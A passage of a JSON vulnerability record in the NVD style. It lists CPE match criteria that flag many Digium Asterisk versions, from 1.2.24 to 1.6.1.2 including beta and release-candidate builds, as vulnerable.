              "criteria": "cpe:2.3:a:digium:asterisk:1.2.24:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "F4149B59-E773-4ED8-A71D-EB7D00808819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A0408C3-0FA7-4A17-9451-C4D46CDA8F27",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.25:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "1726090D-0C37-44A4-AD9B-7ED733B8702D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "B92B045B-8CD6-4C04-9CCB-DCE9A44F6C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "54354E16-3238-43E8-BAA9-93CA7EB44D4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6867EED4-FC3B-4B72-88A5-DED96C729FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.1:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "1A0867FC-7161-433F-A416-D7207C8D4D36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "97BE6B60-3276-4580-843B-743D0D71E3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.26.2:netsec:*:*:*:*:*:*",
              "matchCriteriaId": "36491B32-A405-4C5B-938F-9BEA50A8AF16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "6141909B-EBC4-4726-AE9F-669C31257A5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "754A51AC-EF20-4736-ADDB-D2A70BCB79EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.28.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4600BB66-6DEB-444B-AF9E-BDD06CFD2876",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE089E31-3521-4D12-B81C-B6E386AE1409",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "FFE86E95-1110-46DF-9A7A-0E1AA56ACE4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B6DF5C5-85B4-4595-A69B-1DE70B5E0E41",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F5E9888-16CD-4DB2-8889-CE4477559C71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "C29C9A2C-6435-444E-A20B-5881F3798B85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.30.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "E77A2569-CFAE-498D-A633-803849CFECE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "D16E88E6-42D0-400E-AF43-111B35CE11E8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.31.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AE15A42E-030B-48F0-9498-1755DAAEDFB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "39511726-1202-4179-9708-4D3B28496768",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2A9A4328-F274-4591-A386-943FD6608374",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B4A8C9A-A475-4F02-A6BC-F17CEECBF0AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "CF11B38A-12D7-453A-870D-CDC2DE9313CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D69ACB7-CF9A-40B5-819E-58DA884D4E1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A58CCD3-4A0C-468B-85F2-59A52B7293A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "3542DB91-8487-49D6-AA15-E8FD9D6B99D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BA4F3F1-C3F1-4E15-A854-9BB84E33E4AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "661D710E-79F0-4E98-B35B-ED0549D35C24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68291ADE-F9D1-427B-B150-FDA7F2F4788B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F80CBCB-F58D-4BE7-8E78-67E04C900D01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB61D32E-3400-480E-BD27-BA3F98F94427",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8374B5D-DE7A-4C3C-A5FE-579B17006A54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "C7494CE2-D3CC-404D-BE61-09A2E1FB3E47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06E48482-D9AF-4038-80DA-27D9B4907C0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "9BC3C441-290F-471A-BA19-6B1C4D72A670",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "632ED295-B67D-43CF-BF38-CCE04088BA08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "50F3835F-6F2B-4EA7-B111-3B3C26548BC1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta6:*:*:*:*:*:*",
              "matchCriteriaId": "0DCF7BD2-7903-4DC5-ADDC-EFCDC58736C5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7:*:*:*:*:*:*",
              "matchCriteriaId": "E5BECFE0-286F-4DA1-8CA9-6CEE861C3012",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7.1:*:*:*:*:*:*",
              "matchCriteriaId": "AFFF3245-2D0F-46E3-A1D6-319086489DC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta8:*:*:*:*:*:*",
              "matchCriteriaId": "C91F2524-99D1-4C4B-9A31-21C0FB8B4D5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta9:*:*:*:*:*:*",
              "matchCriteriaId": "7B1BC0FF-9DB6-4FCC-A845-053943CF0D24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "419D4D16-E790-4872-B9AF-1320978768C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "73D30BA6-1EE0-4C3F-8F69-65C698A1B9A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D39FA25D-AB56-470D-94AB-14446DB7D475",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4225252F-5960-4A42-A575-00C125860E89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A65D76A8-BBDD-4BDE-B789-D745C400DCBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8B0F5A5-4252-4A9C-B830-2419E87AE5A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F9085056-3BE9-4309-9601-9CA0569BC215",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D8432455-9064-479F-B060-BF2A74ECC3EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E8EF2D7-371B-4268-989E-25225CC1F7B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABAC4CE9-1CFA-4279-B0CE-18F3C6FB9AB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "E16E37A0-F739-4EEE-A1BB-EBC558C62767",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF0E2562-D0FC-404C-B725-617AEEF20AB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "C831EC2A-C99D-4FB1-8E5C-2FF685792F2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "F37C4158-6C4E-448D-929B-288480748289",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BBA9D27-E3DC-45CE-B56B-2C6781AA6A16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "14CD1CCD-DFF2-4813-B56F-EA1C78AA818E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4499411B-C92E-47F3-A6F2-8C9011B1CBCC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "57325096-F4D8-4146-A6FD-93219F2C72D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.14:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9684FD88-7422-4272-B9BC-D8638B1AA0B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "648639A2-26C4-4EDA-A982-25D400836696",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F9F6FF8-8B88-4A02-B23A-0CADA8CE316E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "37DE011D-1C1B-46AC-9265-F82693CE3C9A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "790BF14A-0193-4A5C-802B-D82200B22342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "15C4C10F-BD36-491A-87E7-2F072796DA33",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
